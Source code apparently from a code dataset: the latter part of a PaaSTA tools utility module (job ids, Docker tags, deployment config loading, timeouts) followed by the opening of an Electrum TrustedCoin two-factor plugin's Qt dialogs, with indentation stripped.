output.append(line)
if log:
_log(
service=service,
line=line,
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
# when finished, get the exit code
process.wait()
returncode = process.returncode
except OSError as e:
if log:
_log(
service=service,
line=e.strerror.rstrip("\n"),
component=component,
level=loglevel,
cluster=cluster,
instance=instance,
)
output.append(e.strerror.rstrip("\n"))
returncode = e.errno
except (KeyboardInterrupt, SystemExit):
# need to clean up the timing thread here
if timeout:
proctimer.cancel()
raise
else:
# Stop the timer
if timeout:
proctimer.cancel()
if returncode == -9:
output.append(f"Command '{command}' timed out (longer than {timeout}s)")
return returncode, "\n".join(output)
def get_umask() -> int:
"""Get the current umask for this process. NOT THREAD SAFE."""
old_umask = os.umask(0o0022)
os.umask(old_umask)
return old_umask
def get_user_agent() -> str:
base_name = os.path.basename(sys.argv[0])
if base_name == "gunicorn":
return f"{sys.argv[-1]} {paasta_tools.__version__}"
elif len(sys.argv) >= 1:
return f"{base_name} {paasta_tools.__version__}"
else:
return f"PaaSTA Tools {paasta_tools.__version__}"
@contextlib.contextmanager
def atomic_file_write(target_path: str) -> Iterator[IO]:
dirname = os.path.dirname(target_path)
basename = os.path.basename(target_path)
if target_path == "-":
yield sys.stdout
else:
with tempfile.NamedTemporaryFile(
dir=dirname, prefix=(".%s-" % basename), delete=False, mode="w"
) as f:
temp_target_path = f.name
yield f
mode = 0o0666 & (~get_umask())
os.chmod(temp_target_path, mode)
os.rename(temp_target_path, target_path)
class InvalidJobNameError(Exception):
pass
def compose_job_id(
name: str,
instance: str,
git_hash: Optional[str] = None,
config_hash: Optional[str] = None,
spacer: str = SPACER,
) -> str:
"""Compose a job/app id by concatenating its name, instance, git hash, and config hash.
:param name: The name of the service
:param instance: The instance of the service
:param git_hash: The git_hash portion of the job_id. If git_hash is set,
config_hash must also be set.
:param config_hash: The config_hash portion of the job_id. If config_hash
is set, git_hash must also be set.
:returns: <name><SPACER><instance> if no tag, or <name><SPACER><instance><SPACER><hashes>...
if extra hash inputs are provided.
"""
composed = f"{name}{spacer}{instance}"
if git_hash and config_hash:
composed = f"{composed}{spacer}{git_hash}{spacer}{config_hash}"
elif git_hash or config_hash:
raise InvalidJobNameError(
"invalid job id because git_hash (%s) and config_hash (%s) must "
"both be defined or neither can be defined" % (git_hash, config_hash)
)
return composed
def decompose_job_id(job_id: str, spacer: str = SPACER) -> Tuple[str, str, str, str]:
"""Break a composed job id into its constituent (service name, instance,
git hash, config hash) by splitting with ``spacer``.
:param job_id: The composed id of the job/app
:returns: A tuple (service name, instance, git hash, config hash) that
comprise the job_id
"""
decomposed = job_id.split(spacer)
if len(decomposed) == 2:
git_hash = None
config_hash = None
elif len(decomposed) == 4:
git_hash = decomposed[2]
config_hash = decomposed[3]
else:
raise InvalidJobNameError("invalid job id %s" % job_id)
return (decomposed[0], decomposed[1], git_hash, config_hash)
def build_docker_image_name(service: str) -> str:
"""docker-paasta.yelpcorp.com:443 is the URL for the Registry where PaaSTA
will look for your images.
:returns: a sanitized-for-Jenkins (s,/,-,g) version of the
service's path in git. E.g. For git.yelpcorp.com:services/foo the
docker image name is docker_registry/services-foo.
"""
docker_registry_url = get_service_docker_registry(service)
name = f"{docker_registry_url}/services-{service}"
return name
def build_docker_tag(service: str, upstream_git_commit: str) -> str:
"""Builds the DOCKER_TAG string
upstream_git_commit is the SHA that we're building. Usually this is the
tip of origin/master.
"""
tag = "{}:paasta-{}".format(build_docker_image_name(service), upstream_git_commit)
return tag
def check_docker_image(service: str, tag: str) -> bool:
"""Checks whether the given image for :service: with :tag: exists.
:raises: ValueError if more than one docker image with :tag: found.
:returns: True if there is exactly one matching image found.
"""
docker_client = get_docker_client()
image_name = build_docker_image_name(service)
docker_tag = build_docker_tag(service, tag)
images = docker_client.images(name=image_name)
# image['RepoTags'] may be None
# Fixed upstream but only in docker-py 2.
# https://github.com/docker/docker-py/issues/1401
result = [image for image in images if docker_tag in (image["RepoTags"] or [])]
if len(result) > 1:
raise ValueError(
f"More than one docker image found with tag {docker_tag}\n{result}"
)
return len(result) == 1
def datetime_from_utc_to_local(utc_datetime: datetime.datetime) -> datetime.datetime:
return datetime_convert_timezone(
utc_datetime, dateutil.tz.tzutc(), dateutil.tz.tzlocal()
)
def datetime_convert_timezone(
dt: datetime.datetime, from_zone: datetime.tzinfo, to_zone: datetime.tzinfo
) -> datetime.datetime:
dt = dt.replace(tzinfo=from_zone)
converted_datetime = dt.astimezone(to_zone)
converted_datetime = converted_datetime.replace(tzinfo=None)
return converted_datetime
def get_username() -> str:
"""Returns the current username in a portable way. Will use the SUDO_USER
environment variable if present.
http://stackoverflow.com/a/2899055
"""
return os.environ.get("SUDO_USER", pwd.getpwuid(os.getuid())[0])
def get_hostname() -> str:
"""Returns the fully-qualified domain name of the server this code is
running on.
"""
return socket.getfqdn()
def get_soa_cluster_deploy_files(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> Iterator[Tuple[str, str]]:
if service is None:
service = "*"
service_path = os.path.join(soa_dir, service)
valid_clusters = "|".join(load_system_paasta_config().get_clusters())
if instance_type in INSTANCE_TYPES:
instance_types = instance_type
else:
instance_types = "|".join(INSTANCE_TYPES)
search_re = r"/.*/(" + instance_types + r")-(" + valid_clusters + r")\.yaml$"
for yaml_file in glob.glob("%s/*.yaml" % service_path):
try:
with open(yaml_file):
cluster_re_match = re.search(search_re, yaml_file)
if cluster_re_match is not None:
cluster = cluster_re_match.group(2)
yield (cluster, yaml_file)
except IOError as err:
print(f"Error opening {yaml_file}: {err}")
def list_clusters(
service: str = None, soa_dir: str = DEFAULT_SOA_DIR, instance_type: str = None
) -> List[str]:
"""Returns a sorted list of clusters a service is configured to deploy to,
or all clusters if ``service`` is not specified.
Includes every cluster that has a ``marathon-*.yaml`` or ``tron-*.yaml`` file associated with it.
:param service: The service name. If unspecified, clusters running any service will be included.
:returns: A sorted list of cluster names
"""
clusters = set()
for cluster, _ in get_soa_cluster_deploy_files(
service=service, soa_dir=soa_dir, instance_type=instance_type
):
clusters.add(cluster)
return sorted(clusters)
def list_all_instances_for_service(
service: str,
clusters: Iterable[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
cache: bool = True,
) -> Set[str]:
instances = set()
if not clusters:
clusters = list_clusters(service, soa_dir=soa_dir)
for cluster in clusters:
if cache:
si_list = get_service_instance_list(
service, cluster, instance_type, soa_dir=soa_dir
)
else:
si_list = get_service_instance_list_no_cache(
service, cluster, instance_type, soa_dir=soa_dir
)
for service_instance in si_list:
instances.add(service_instance[1])
return instances
def get_tron_instance_list_from_yaml(
service: str, cluster: str, soa_dir: str
) -> Collection[Tuple[str, str]]:
instance_list = []
try:
tron_config_content = load_tron_yaml(
service=service, cluster=cluster, soa_dir=soa_dir
)
except NoConfigurationForServiceError:
return []
jobs = extract_jobs_from_tron_yaml(config=tron_config_content)
for job_name, job in jobs.items():
action_names = get_action_names_from_job(job=job)
for name in action_names:
instance = f"{job_name}.{name}"
instance_list.append((service, instance))
return instance_list
def get_action_names_from_job(job: dict) -> Collection[str]:
# Warning: This duplicates some logic from TronActionConfig, but can't be imported here
# dute to circular imports
actions = job.get("actions", {})
if isinstance(actions, dict):
return list(actions.keys())
elif actions is None:
return []
else:
raise TypeError("Tron actions must be a dictionary")
def load_tron_yaml(service: str, cluster: str, soa_dir: str) -> Dict[str, Any]:
config = service_configuration_lib.read_extra_service_information(
service_name=service, extra_info=f"tron-{cluster}", soa_dir=soa_dir
)
if not config:
raise NoConfigurationForServiceError(
"No Tron configuration found for service %s" % service
)
return config
def extract_jobs_from_tron_yaml(config: Dict) -> Dict[str, Any]:
config = {
key: value for key, value in config.items() if not key.startswith("_")
} # filter templates
return config or {}
def get_instance_list_from_yaml(
service: str, conf_file: str, soa_dir: str
) -> Collection[Tuple[str, str]]:
instance_list = []
instances = service_configuration_lib.read_extra_service_information(
service, conf_file, soa_dir=soa_dir
)
for instance in instances:
if instance.startswith("_"):
log.debug(
f"Ignoring {service}.{instance} as instance name begins with '_'."
)
else:
instance_list.append((service, instance))
return instance_list
def get_pipeline_config(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> List[Dict]:
service_configuration = read_service_configuration(service, soa_dir)
return service_configuration.get("deploy", {}).get("pipeline", [])
def get_pipeline_deploy_groups(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> List[str]:
pipeline_steps = [step["step"] for step in get_pipeline_config(service, soa_dir)]
return [step for step in pipeline_steps if is_deploy_step(step)]
def get_service_instance_list_no_cache(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
instance_types: Tuple[str, ...]
if not cluster:
cluster = load_system_paasta_config().get_cluster()
if instance_type in INSTANCE_TYPES:
instance_types = (instance_type,)
else:
instance_types = INSTANCE_TYPES
instance_list: List[Tuple[str, str]] = []
for srv_instance_type in instance_types:
conf_file = f"{srv_instance_type}-{cluster}"
log.debug(
f"Enumerating all instances for config file: {soa_dir}/*/{conf_file}.yaml"
)
if srv_instance_type == "tron":
instance_list.extend(
get_tron_instance_list_from_yaml(
service=service, cluster=cluster, soa_dir=soa_dir
)
)
else:
instance_list.extend(
get_instance_list_from_yaml(
service=service, conf_file=conf_file, soa_dir=soa_dir
)
)
log.debug("Enumerated the following instances: %s", instance_list)
return instance_list
@time_cache(ttl=5)
def get_service_instance_list(
service: str,
cluster: Optional[str] = None,
instance_type: str = None,
soa_dir: str = DEFAULT_SOA_DIR,
) -> List[Tuple[str, str]]:
"""Enumerate the instances defined for a service as a list of tuples.
:param service: The service name
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (name, instance) for each instance defined for the service name
"""
return get_service_instance_list_no_cache(
service=service, cluster=cluster, instance_type=instance_type, soa_dir=soa_dir
)
def get_services_for_cluster(
cluster: str = None, instance_type: str = None, soa_dir: str = DEFAULT_SOA_DIR
) -> List[Tuple[str, str]]:
"""Retrieve all services and instances defined to run in a cluster.
:param cluster: The cluster to read the configuration for
:param instance_type: The type of instances to examine: 'marathon', 'tron', or None (default) for both
:param soa_dir: The SOA config directory to read from
:returns: A list of tuples of (service, instance)
"""
if not cluster:
cluster = load_system_paasta_config().get_cluster()
rootdir = os.path.abspath(soa_dir)
log.debug(
"Retrieving all service instance names from %s for cluster %s", rootdir, cluster
)
instance_list: List[Tuple[str, str]] = []
for srv_dir in os.listdir(rootdir):
service_instance_list = get_service_instance_list(
srv_dir, cluster, instance_type, soa_dir
)
for service_instance in service_instance_list:
service, instance = service_instance
if instance.startswith("_"):
log.debug(
f"Ignoring {service}.{instance} as instance name begins with '_'."
)
else:
instance_list.append(service_instance)
return instance_list
def parse_yaml_file(yaml_file: str) -> Any:
return yaml.safe_load(open(yaml_file))
def get_docker_host() -> str:
return os.environ.get("DOCKER_HOST", "unix://var/run/docker.sock")
def get_docker_client() -> Client:
client_opts = kwargs_from_env(assert_hostname=False)
if "base_url" in client_opts:
return Client(**client_opts)
else:
return Client(base_url=get_docker_host(), **client_opts)
def get_running_mesos_docker_containers() -> List[Dict]:
client = get_docker_client()
running_containers = client.containers()
return [
container
for container in running_containers
if "mesos-" in container["Names"][0]
]
class TimeoutError(Exception):
pass
class Timeout:
# From http://stackoverflow.com/questions/2281850/timeout-function-if-it-takes-too-long-to-finish
def __init__(self, seconds: int = 1, error_message: str = "Timeout") -> None:
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum: int, frame: FrameType) -> None:
raise TimeoutError(self.error_message)
def __enter__(self) -> None:
self.old_handler = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type: Any, value: Any, traceback: Any) -> None:
signal.alarm(0)
signal.signal(signal.SIGALRM, self.old_handler)
def print_with_indent(line: str, indent: int = 2) -> None:
"""Print a line with a given indent level"""
paasta_print(" " * indent + line)
class NoDeploymentsAvailable(Exception):
pass
def load_deployments_json(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> "DeploymentsJsonV1":
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
return DeploymentsJsonV1(json.load(f)["v1"])
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
def load_v2_deployments_json(
service: str, soa_dir: str = DEFAULT_SOA_DIR
) -> "DeploymentsJsonV2":
deployment_file = os.path.join(soa_dir, service, "deployments.json")
if os.path.isfile(deployment_file):
with open(deployment_file) as f:
return DeploymentsJsonV2(service=service, config_dict=json.load(f)["v2"])
else:
e = f"{deployment_file} was not found. 'generate_deployments_for_service --service {service}' must be run first"
raise NoDeploymentsAvailable(e)
DeploymentsJsonV1Dict = Dict[str, BranchDictV1]
DeployGroup = str
BranchName = str
class _DeploymentsJsonV2ControlsDict(TypedDict, total=False):
force_bounce: Optional[str]
desired_state: str
class _DeploymentsJsonV2DeploymentsDict(TypedDict):
docker_image: str
git_sha: str
class DeploymentsJsonV2Dict(TypedDict):
deployments: Dict[DeployGroup, _DeploymentsJsonV2DeploymentsDict]
controls: Dict[BranchName, _DeploymentsJsonV2ControlsDict]
class DeploymentsJsonDict(TypedDict):
v1: DeploymentsJsonV1Dict
v2: DeploymentsJsonV2Dict
class DeploymentsJsonV1:
def __init__(self, config_dict: DeploymentsJsonV1Dict) -> None:
self.config_dict = config_dict
def get_branch_dict(self, service: str, branch: str) -> BranchDictV1:
full_branch = f"{service}:paasta-{branch}"
return self.config_dict.get(full_branch, {})
def __eq__(self, other: Any) -> bool:
return (
isinstance(other, DeploymentsJsonV1)
and other.config_dict == self.config_dict
)
class DeploymentsJsonV2:
def __init__(self, service: str, config_dict: DeploymentsJsonV2Dict) -> None:
self.config_dict = config_dict
self.service = service
def get_branch_dict(
self, service: str, branch: str, deploy_group: str
) -> BranchDictV2:
full_branch = f"{service}:{branch}"
branch_dict: BranchDictV2 = {
"docker_image": self.get_docker_image_for_deploy_group(deploy_group),
"git_sha": self.get_git_sha_for_deploy_group(deploy_group),
"desired_state": self.get_desired_state_for_branch(full_branch),
"force_bounce": self.get_force_bounce_for_branch(full_branch),
}
return branch_dict
def get_deploy_groups(self) -> Collection[str]:
return self.config_dict["deployments"].keys()
def get_docker_image_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["docker_image"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_git_sha_for_deploy_group(self, deploy_group: str) -> str:
try:
return self.config_dict["deployments"][deploy_group]["git_sha"]
except KeyError:
e = f"{self.service} not deployed to {deploy_group}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_desired_state_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"desired_state", "start"
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_force_bounce_for_branch(self, control_branch: str) -> str:
try:
return self.config_dict["controls"][control_branch].get(
"force_bounce", None
)
except KeyError:
e = f"{self.service} not configured for {control_branch}. Has mark-for-deployment been run?"
raise NoDeploymentsAvailable(e)
def get_paasta_branch(cluster: str, instance: str) -> str:
return SPACER.join((cluster, instance))
def parse_timestamp(tstamp: str) -> datetime.datetime:
return datetime.datetime.strptime(tstamp, "%Y%m%dT%H%M%S")
def format_timestamp(dt: datetime.datetime = None) -> str:
if dt is None:
dt = datetime.datetime.utcnow()
return dt.strftime("%Y%m%dT%H%M%S")
def get_paasta_tag_from_deploy_group(identifier: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{identifier}-{timestamp}-{desired_state}"
def get_paasta_tag(cluster: str, instance: str, desired_state: str) -> str:
timestamp = format_timestamp(datetime.datetime.utcnow())
return f"paasta-{cluster}.{instance}-{timestamp}-{desired_state}"
def format_tag(tag: str) -> str:
return "refs/tags/%s" % tag
class NoDockerImageError(Exception):
pass
def get_config_hash(config: Any, force_bounce: str = None) -> str:
"""Create an MD5 hash of the configuration dictionary to be sent to
Marathon. Or anything really, so long as str(config) works. Returns
the first 8 characters so things are not really long.
:param config: The configuration to hash
:param force_bounce: a timestamp (in the form of a string) that is appended before hashing
that can be used to force a hash change
:returns: A MD5 hash of str(config)
"""
hasher = hashlib.md5()
hasher.update(
json.dumps(config, sort_keys=True).encode("UTF-8")
+ (force_bounce or "").encode("UTF-8")
)
return "config%s" % hasher.hexdigest()[:8]
def get_git_sha_from_dockerurl(docker_url: str) -> str:
parts = docker_url.split("/")
parts = parts[-1].split("-")
return parts[-1][:8]
def get_code_sha_from_dockerurl(docker_url: str) -> str:
"""We encode the sha of the code that built a docker image *in* the docker
url. This function takes that url as input and outputs the partial sha
"""
try:
git_sha = get_git_sha_from_dockerurl(docker_url)
return "git%s" % git_sha
except Exception:
return "gitUNKNOWN"
def is_under_replicated(
num_available: int, expected_count: int, crit_threshold: int
) -> Tuple[bool, float]:
"""Calculates if something is under replicated
:param num_available: How many things are up
:param expected_count: How many things you think should be up
:param crit_threshold: Int from 0-100
:returns: Tuple of (bool, ratio)
"""
if expected_count == 0:
ratio = 100.0
else:
ratio = (num_available / float(expected_count)) * 100
if ratio < int(crit_threshold):
return (True, ratio)
else:
return (False, ratio)
def deploy_blacklist_to_constraints(
deploy_blacklist: DeployBlacklist,
) -> List[Constraint]:
"""Converts a blacklist of locations into marathon appropriate constraints.
https://mesosphere.github.io/marathon/docs/constraints.html#unlike-operator
:param blacklist: List of lists of locations to blacklist
:returns: List of lists of constraints
"""
constraints: List[Constraint] = []
for blacklisted_location in deploy_blacklist:
constraints.append([blacklisted_location[0], "UNLIKE", blacklisted_location[1]])
return constraints
def deploy_whitelist_to_constraints(
deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Converts a whitelist of locations into marathon appropriate constraints
https://mesosphere.github.io/marathon/docs/constraints.html#like-operator
:param deploy_whitelist: List of lists of locations to whitelist
:returns: List of lists of constraints
"""
if deploy_whitelist is not None:
(region_type, regions) = deploy_whitelist
regionstr = "|".join(regions)
return [[region_type, "LIKE", regionstr]]
return []
def terminal_len(text: str) -> int:
"""Return the number of characters that text will take up on a terminal. """
return len(remove_ansi_escape_sequences(text))
def format_table(
rows: Iterable[Union[str, Sequence[str]]], min_spacing: int = 2
) -> List[str]:
"""Formats a table for use on the command line.
:param rows: List of rows, each of which can either be a tuple of strings containing the row's values, or a string
to be inserted verbatim. Each row (except literal strings) should be the same number of elements as
all the others.
:returns: A string containing rows formatted as a table.
"""
list_rows = [r for r in rows if not isinstance(r, str)]
# If all of the rows are strings, we have nothing to do, so short-circuit.
if not list_rows:
return cast(List[str], rows)
widths = []
for i in range(len(list_rows[0])):
widths.append(max(terminal_len(r[i]) for r in list_rows))
expanded_rows = []
for row in rows:
if isinstance(row, str):
expanded_rows.append([row])
else:
expanded_row = []
for i, cell in enumerate(row):
if i == len(row) - 1:
padding = ""
else:
padding = " " * (widths[i] - terminal_len(cell))
expanded_row.append(cell + padding)
expanded_rows.append(expanded_row)
return [(" " * min_spacing).join(r) for r in expanded_rows]
_DeepMergeT = TypeVar("_DeepMergeT", bound=Any)
class DuplicateKeyError(Exception):
pass
def deep_merge_dictionaries(
overrides: _DeepMergeT, defaults: _DeepMergeT, allow_duplicate_keys: bool = True
) -> _DeepMergeT:
"""
Merges two dictionaries.
"""
result = copy.deepcopy(defaults)
stack: List[Tuple[Dict, Dict]] = [(overrides, result)]
while stack:
source_dict, result_dict = stack.pop()
for key, value in source_dict.items():
try:
child = result_dict[key]
except KeyError:
result_dict[key] = value
else:
if isinstance(value, dict) and isinstance(child, dict):
stack.append((value, child))
else:
if allow_duplicate_keys:
result_dict[key] = value
else:
raise DuplicateKeyError(
f"defaults and overrides both have key {key}"
)
return result
class ZookeeperPool:
"""
A context manager that shares the same KazooClient with its children. The first nested context manager
creates and deletes the client and shares it with any of its children. This allows to place a context
manager over a large number of zookeeper calls without opening and closing a connection each time.
GIL makes this 'safe'.
"""
counter: int = 0
zk: KazooClient = None
@classmethod
def __enter__(cls) -> KazooClient:
if cls.zk is None:
cls.zk = KazooClient(
hosts=load_system_paasta_config().get_zk_hosts(), read_only=True
)
cls.zk.start()
cls.counter = cls.counter + 1
return cls.zk
@classmethod
def __exit__(cls, *args: Any, **kwargs: Any) -> None:
cls.counter = cls.counter - 1
if cls.counter == 0:
cls.zk.stop()
cls.zk.close()
cls.zk = None
def calculate_tail_lines(verbose_level: int) -> int:
if verbose_level <= 1:
return 0
else:
return 10 ** (verbose_level - 1)
def is_deploy_step(step: str) -> bool:
"""
Returns true if the given step deploys to an instancename
Returns false if the step is a predefined step-type, e.g. itest or command-*
"""
return not (
(step in DEPLOY_PIPELINE_NON_DEPLOY_STEPS) or (step.startswith("command-"))
)
_UseRequestsCacheFuncT = TypeVar("_UseRequestsCacheFuncT", bound=Callable)
def use_requests_cache(
cache_name: str, backend: str = "memory", **kwargs: Any
) -> Callable[[_UseRequestsCacheFuncT], _UseRequestsCacheFuncT]:
def wrap(fun: _UseRequestsCacheFuncT) -> _UseRequestsCacheFuncT:
def fun_with_cache(*args: Any, **kwargs: Any) -> Any:
requests_cache.install_cache(cache_name, backend=backend, **kwargs)
result = fun(*args, **kwargs)
requests_cache.uninstall_cache()
return result
return cast(_UseRequestsCacheFuncT, fun_with_cache)
return wrap
def long_job_id_to_short_job_id(long_job_id: str) -> str:
service, instance, _, __ = decompose_job_id(long_job_id)
return compose_job_id(service, instance)
def mean(iterable: Collection[float]) -> float:
"""
Returns the average value of an iterable
"""
return sum(iterable) / len(iterable)
def prompt_pick_one(sequence: Collection[str], choosing: str) -> str:
if not sys.stdin.isatty():
paasta_print(
"No {choosing} specified and no TTY present to ask."
"Please specify a {choosing} using the cli.".format(choosing=choosing),
file=sys.stderr,
)
sys.exit(1)
if not sequence:
paasta_print(
f"PaaSTA needs to pick a {choosing} but none were found.", file=sys.stderr
)
sys.exit(1)
global_actions = [str("quit")]
choices = [(item, item) for item in sequence]
if len(choices) == 1:
return choices[0][0]
chooser = choice.Menu(choices=choices, global_actions=global_actions)
chooser.title = 'Please pick a {choosing} from the choices below (or "quit" to quit):'.format(
choosing=str(choosing)
)
try:
result = chooser.ask()
except (KeyboardInterrupt, EOFError):
paasta_print("")
sys.exit(1)
if isinstance(result, tuple) and result[1] == str("quit"):
sys.exit(1)
else:
return result
def to_bytes(obj: Any) -> bytes:
if isinstance(obj, bytes):
return obj
elif isinstance(obj, str):
return obj.encode("UTF-8")
else:
return str(obj).encode("UTF-8")
TLS = threading.local()
@contextlib.contextmanager
def set_paasta_print_file(file: Any) -> Iterator[None]:
TLS.paasta_print_file = file
yield
TLS.paasta_print_file = None
def paasta_print(*args: Any, **kwargs: Any) -> None:
f = kwargs.pop("file", sys.stdout) or sys.stdout
f = getattr(TLS, "paasta_print_file", f) or f
buf = getattr(f, "buffer", None)
# Here we're assuming that the file object works with strings and its
# `buffer` works with bytes. So, if the file object doesn't have `buffer`,
# we output via the file object itself using strings.
obj_to_arg: Callable[[Any], Any]
if buf is not None:
f = buf
obj_to_arg = to_bytes
else:
def obj_to_arg(o: Any) -> str:
return to_bytes(o).decode("UTF-8", errors="ignore")
end = obj_to_arg(kwargs.pop("end", "\n"))
sep = obj_to_arg(kwargs.pop("sep", " "))
assert not kwargs, kwargs
to_print = sep.join(obj_to_arg(x) for x in args) + end
f.write(to_print)
f.flush()
_TimeoutFuncRetType = TypeVar("_TimeoutFuncRetType")
def timeout(
seconds: int = 10,
error_message: str = os.strerror(errno.ETIME),
use_signals: bool = True,
) -> Callable[[Callable[..., _TimeoutFuncRetType]], Callable[..., _TimeoutFuncRetType]]:
if use_signals:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
def _handle_timeout(signum: int, frame: FrameType) -> None:
raise TimeoutError(error_message)
def wrapper(*args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(seconds)
try:
result = func(*args, **kwargs)
finally:
signal.alarm(0)
return result
return wraps(func)(wrapper)
else:
def decorate(
func: Callable[..., _TimeoutFuncRetType]
) -> Callable[..., _TimeoutFuncRetType]:
# https://github.com/python/mypy/issues/797
return _Timeout(func, seconds, error_message) # type: ignore
return decorate
class _Timeout:
def __init__(
self,
function: Callable[..., _TimeoutFuncRetType],
seconds: float,
error_message: str,
) -> None:
self.seconds = seconds
self.control: queue.Queue[
Tuple[bool, Union[_TimeoutFuncRetType, Tuple]]
] = queue.Queue()
self.function = function
self.error_message = error_message
def run(self, *args: Any, **kwargs: Any) -> None:
# Try and put the result of the function into the q
# if an exception occurs then we put the exc_info instead
# so that it can be raised in the main thread.
try:
self.control.put((True, self.function(*args, **kwargs)))
except Exception:
self.control.put((False, sys.exc_info()))
def __call__(self, *args: Any, **kwargs: Any) -> _TimeoutFuncRetType:
self.func_thread = threading.Thread(target=self.run, args=args, kwargs=kwargs)
self.func_thread.daemon = True
self.timeout = self.seconds + time.time()
self.func_thread.start()
return self.get_and_raise()
def get_and_raise(self) -> _TimeoutFuncRetType:
while not self.timeout < time.time():
time.sleep(0.01)
if not self.func_thread.is_alive():
ret = self.control.get()
if ret[0]:
return cast(_TimeoutFuncRetType, ret[1])
else:
_, e, tb = cast(Tuple, ret[1])
raise e.with_traceback(tb)
raise TimeoutError(self.error_message)
def suggest_possibilities(
word: str, possibilities: Iterable[str], max_suggestions: int = 3
) -> str:
suggestions = cast(
List[str],
difflib.get_close_matches(
word=word, possibilities=set(possibilities), n=max_suggestions
),
)
if len(suggestions) == 1:
return f"\nDid you mean: {suggestions[0]}?"
elif len(suggestions) >= 1:
return f"\nDid you mean one of: {', '.join(suggestions)}?"
else:
return ""
def list_services(soa_dir: str = DEFAULT_SOA_DIR) -> Sequence[str]:
"""Returns a sorted list of all services"""
return sorted(os.listdir(os.path.abspath(soa_dir)))
def get_possible_launched_by_user_variable_from_env() -> str:
return os.getenv("SUDO_USER") or getpass.getuser()
def load_all_configs(
cluster: str, file_prefix: str, soa_dir: str
) -> Mapping[str, Mapping[str, Any]]:
config_dicts = {}
for service in os.listdir(soa_dir):
config_dicts[
service
] = service_configuration_lib.read_extra_service_information(
service, f"{file_prefix}-{cluster}", soa_dir=soa_dir
)
return config_dicts
|
qt.py
|
from .tc_plugins import TCPlugin
from .tools import TOS, HandlerTwoFactor
from .tc_requests import tc_requests
import os
import sys
import threading
from functools import partial
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import (QVBoxLayout, QLabel, QGridLayout, QHBoxLayout, QRadioButton, QCheckBox, QLineEdit)
from electrum.plugin import hook
from electrum.i18n import _
from electrum.util import is_valid_email
from electrum.gui.qt.util import (read_QIcon, WindowModalDialog, WaitingDialog, OkButton, CancelButton, Buttons,
icon_path, WWLabel, CloseButton, EnterButton, HelpLabel)
from electrum.gui.qt.amountedit import AmountEdit
from electrum.gui.qt.qrcodewidget import QRCodeWidget
from electrum.gui.qt.installwizard import InstallWizard
from electrum.gui.qt.main_window import StatusBarButton
from electrum.base_wizard import GoBack
class Plugin(TCPlugin):
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
def requires_settings(self):
# Return True to add a Settings button.
return True
def settings_widget(self, window):
# Return a button that when pressed presents a settings dialog.
return EnterButton(_('Settings'), partial(self.settings_dialog, window))
def settings_dialog(self, window):
# Return a settings dialog.
d = WindowModalDialog(window, _("Email settings"))
vbox = QVBoxLayout(d)
d.setMinimumSize(500, 200)
vbox.addStretch()
vbox.addLayout(Buttons(CloseButton(d), OkButton(d)))
d.show()
def accept_terms_of_use(self, window):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Terms of Service")))
tos_e = TOS()
tos_e.setReadOnly(True)
vbox.addWidget(tos_e)
tos_received = False
vbox.addWidget(QLabel(_("Please enter your e-mail address")))
email_e = QLineEdit()
vbox.addWidget(email_e)
next_button = window.next_button
prior_button_text = next_button.text()
next_button.setText(_('Accept'))
def request_TOS():
self.TOS = '====================================ABC'
tos_e.tos_signal.emit()
def on_result():
tos_e.setText(self.TOS)
nonlocal tos_received
tos_received = True
set_enabled()
def on_error(msg):
window.show_error(str(msg))
window.terminate()
def set_enabled():
next_button.setEnabled(tos_received and is_valid_email(email_e.text()))
tos_e.tos_signal.connect(on_result)
tos_e.error_signal.connect(on_error)
t = threading.Thread(target=request_TOS)
t.setDaemon(True)
t.start()
email_e.textChanged.connect(set_enabled)
email_e.setFocus(True)
window.exec_layout(vbox, next_enabled=False)
next_button.setText(prior_button_text)
email = str(email_e.text())
self.create_remote_key(email, window)
def request_otp_dialog(self, window, short_id, otp_secret, xpub3):
vbox = QVBoxLayout()
if otp_secret is not None:
uri = "otpauth://hotp/%s?secret=%s" % ('otp_secret', otp_secret)
l = QLabel(
"Please scan the following QR code in Google Authenticator. You may as well use the following key: %s" % otp_secret)
l.setWordWrap(True)
vbox.addWidget(l)
qrw = QRCodeWidget(uri)
vbox.addWidget(qrw, 1)
msg = _('Then, enter your Google Authenticator code:')
else:
label = QLabel(
"This wallet is already registered with TrustedCoin. "
"To finalize wallet creation, please enter your Google Authenticator Code. "
)
label.setWordWrap(1)
vbox.addWidget(label)
